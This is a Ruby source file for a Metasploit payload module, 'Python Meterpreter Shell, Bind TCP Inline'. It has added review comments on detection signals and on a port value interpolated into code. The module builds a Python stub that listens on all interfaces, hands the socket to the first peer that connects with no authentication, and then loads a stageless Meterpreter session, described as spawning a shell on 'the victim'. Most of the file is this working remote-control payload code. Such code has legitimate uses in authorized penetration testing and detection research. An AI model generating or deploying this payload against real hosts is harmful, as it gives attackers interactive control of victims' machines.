1a353ee273
While the length of the input payload is always the same size, it may not always have the same contents due to random checksum URI and UUID generation. This leads to payloads whose sizes can vary by a few bytes between runs.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
  # No fixed size is recorded for this payload: the generated output can differ
  # by a few bytes between runs because of random checksum URI and UUID
  # generation.
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Payload::Python
  include Msf::Payload::Python::BindTcp
  include Msf::Payload::Python::MeterpreterLoader

  # Registers this module's metadata: a single (inline) Python payload whose
  # handler is Msf::Handler::BindTcp and whose session type is
  # Msf::Sessions::Meterpreter_Python_Python.
  #
  # @param info [Hash] metadata supplied by the caller; it is merged with the
  #   values declared here through merge_info before being handed to super.
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name'        => 'Python Meterpreter Shell, Bind TCP Inline',
        'Description' => 'Connect to the victim and spawn a Meterpreter shell',
        'Author'      => 'Spencer McIntyre',
        'License'     => MSF_LICENSE,
        'Platform'    => 'python',
        'Arch'        => ARCH_PYTHON,
        'Handler'     => Msf::Handler::BindTcp,
        'Session'     => Msf::Sessions::Meterpreter_Python_Python
      )
    )
  end

  # Builds the stageless payload: a Python socket-setup stub is stored in
  # +opts+ and the result of stage_meterpreter is wrapped by
  # py_create_exec_stub.
  #
  # Properties of the generated stub that matter for review and detection:
  # * it listens on 0.0.0.0, i.e. every IPv4 interface of the host, not only
  #   loopback or a single chosen address;
  # * listen(1) followed by one accept() means the first peer to connect gets
  #   the socket +s+; nothing in this stub restricts or authenticates the peer;
  # * on the host this appears as a Python interpreter opening a TCP listener
  #   and accepting one inbound connection, which is a usable host-based and
  #   network signal.
  #
  # NOTE(review): opts[:port] is interpolated verbatim into Python source text.
  # Presumably it is an integer supplied by the framework; confirm against the
  # caller, because any other value changes the generated code.
  #
  # @param opts [Hash] generation options; reads :port and WRITES
  #   :stageless_tcp_socket_setup and :stageless into the hash it was given.
  # @return the value returned by py_create_exec_stub (presumably the Python
  #   source of the payload as a String; defined outside this file).
  def generate_bind_tcp(opts={})
    stub_lines = [
      "bind_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n",
      "bind_sock.bind(('0.0.0.0', #{opts[:port]}))\n",
      "bind_sock.listen(1)\n",
      "s, address = bind_sock.accept()\n"
    ]

    # Same insertion order as before: the setup stub first, then the flag.
    opts[:stageless_tcp_socket_setup] = stub_lines.join
    opts[:stageless] = true

    py_create_exec_stub(stage_meterpreter(opts))
  end
end